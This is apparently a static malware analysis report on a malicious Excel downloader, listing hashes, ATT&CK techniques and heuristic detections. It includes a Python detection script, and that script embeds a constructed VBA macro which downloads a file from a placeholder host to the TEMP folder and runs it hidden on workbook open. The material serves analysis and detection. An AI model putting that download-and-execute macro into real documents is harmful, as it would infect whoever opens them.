Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 1103596901ca7b85…

MALICIOUS

Office (OLE) / .XLS

Size: 74.0 KB
Created: 2022-11-29 07:16:03
Authoring application: Microsoft Excel
First seen: 2022-11-30
MD5: c3329de25195c20272d188a7ef3790f0
SHA-1: b60879c4156c4794a09e8dc464b4b756a045121c
SHA-256: 1103596901ca7b8503927fc2ca99dc9132a58c686da26aca030480b2584b638f
Risk Score: 188

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1105 Ingress Tool Transfer

The file contains VBA macros that follow a downloader pattern: CreateObject() and Shell() are used to fetch content from a URL and act on it. The HTML_PDF function attempts to fetch data from the supplied URL, and the trombetta function processes what it returns; an Environ() call (environment-variable access, commonly used to resolve a writable path) is also present. Shell() and CreateObject() calls combined with this download-then-execute flow are strong indicators of malicious intent, and the ClamAV signature match (Xls.Downloader) supports that assessment.
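The triage described above can be reproduced over decoded macro source, for example the text `olevba -c sample.xls` prints for the extracted macros.bas. The script below is an added example, not the analyzer's own code: it re-implements the report's OLE_VBA_SHELL, OLE_VBA_CREATEOBJ, OLE_VBA_ENVIRON and OLE_VBA_MACROS heuristics as regexes over macro text, pulls URL literals out of the code, and applies the same download-then-execute reasoning to reach a verdict. The VBA it scans is a constructed stand-in (the real macros.bas is not reproduced on this page); only the function names HTML_PDF and trombetta come from the report, the bodies, the URL and the severity weights are assumptions.

```python
"""Heuristic VBA downloader triage (added example, not the analyzer's rules)."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Rule table: (rule id, severity, pattern). IDs and severities mirror the
# report's heuristics; the regexes are my approximation of each check.
HEURISTICS = [
    ("OLE_VBA_SHELL", "critical", r"\bShell\b"),            # Shell p / Shell(p)
    ("OLE_VBA_CREATEOBJ", "high", r"\bCreateObject\s*\("),
    ("OLE_VBA_ENVIRON", "low", r"\bEnviron\s*\("),
]
# Assumed weights; the report's 188 risk score uses the vendor's own scale.
SEVERITY_WEIGHT = {"critical": 50, "high": 30, "medium": 10, "low": 5}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed stand-in for macros.bas. Function names come from the report;
# the bodies and the (non-resolvable) URL do not.
SAMPLE_VBA = """\
Private Sub Workbook_Open()
    trombetta HTML_PDF("https://example.invalid/update.bin")
End Sub

Function HTML_PDF(u As String) As Variant
    ' the COM object that does the actual fetch
    Dim h As Object
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", u, False
    h.send
    HTML_PDF = h.responseBody
End Function

Sub trombetta(d As Variant)
    ' CreateObject is mentioned here only in a comment and must not count
    Dim p As String
    p = Environ("TEMP") & "\\upd.exe"
    Dim s As Object
    Set s = CreateObject("ADODB.Stream")
    s.Type = 1: s.Open: s.Write d
    s.SaveToFile p, 2
    Call Shell(p, vbHide)
End Sub
"""


@dataclass(frozen=True)
class Hit:
    rule_id: str
    severity: str
    line_no: int   # 0 for file-level findings
    line: str


def strip_comment(line: str) -> str:
    """Drop a trailing ' comment while honouring double-quoted string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def scan_vba(source: str) -> list[Hit]:
    """One Hit per (rule, line) match; VBA identifiers are case-insensitive."""
    hits = []
    for n, raw in enumerate(source.splitlines(), 1):
        code = strip_comment(raw)
        for rule_id, sev, pat in HEURISTICS:
            if re.search(pat, code, re.IGNORECASE):
                hits.append(Hit(rule_id, sev, n, raw.strip()))
    if source.strip():  # presence of any macro code is itself a (medium) finding
        hits.append(Hit("OLE_VBA_MACROS", "medium", 0, "Document contains VBA macro code"))
    return hits


def extract_urls(source: str) -> list[str]:
    """URL literals from code lines only (comments are ignored)."""
    return [u for raw in source.splitlines() for u in URL_RE.findall(strip_comment(raw))]


def triage(source: str) -> dict:
    hits = scan_vba(source)
    triggered = {h.rule_id: h.severity for h in hits}
    urls = extract_urls(source)
    # Downloader pattern as argued in the report: an object that fetches
    # (CreateObject) plus something that executes (Shell) plus a URL to fetch.
    downloader = {"OLE_VBA_SHELL", "OLE_VBA_CREATEOBJ"} <= triggered.keys() and bool(urls)
    return {
        "hits": hits,
        "rule_counts": dict(Counter(h.rule_id for h in hits)),
        "score": sum(SEVERITY_WEIGHT[s] for s in triggered.values()),
        "urls": urls,
        "downloader_pattern": downloader,
        "verdict": "MALICIOUS" if downloader else ("SUSPICIOUS" if triggered else "CLEAN"),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for h in result["hits"]:
        print(f"{h.severity:8} {h.rule_id:20} L{h.line_no}: {h.line}")
    print(result["verdict"], result["score"], result["urls"])
```

With oletools installed, `olevba -c sample.xls` gives the decoded source to feed into `triage()`; the comment stripper matters in practice because macro authors routinely pad code with comments that mention the very APIs a naive keyword scan looks for.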

Heuristics (5)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Xls.Downloader.b83ac4c497e169b5-9980307-0
  • OLE_VBA_CREATEOBJ (high): CreateObject call
  • OLE_VBA_MACROS (medium): Document contains VBA macro code
  • OLE_VBA_ENVIRON (low): Environ() call (env variable access)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: eb48ca61505819a4d99cc693d2dd3c25fbe1407842f37a3b8b364fd8c22ae10c
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5069 bytes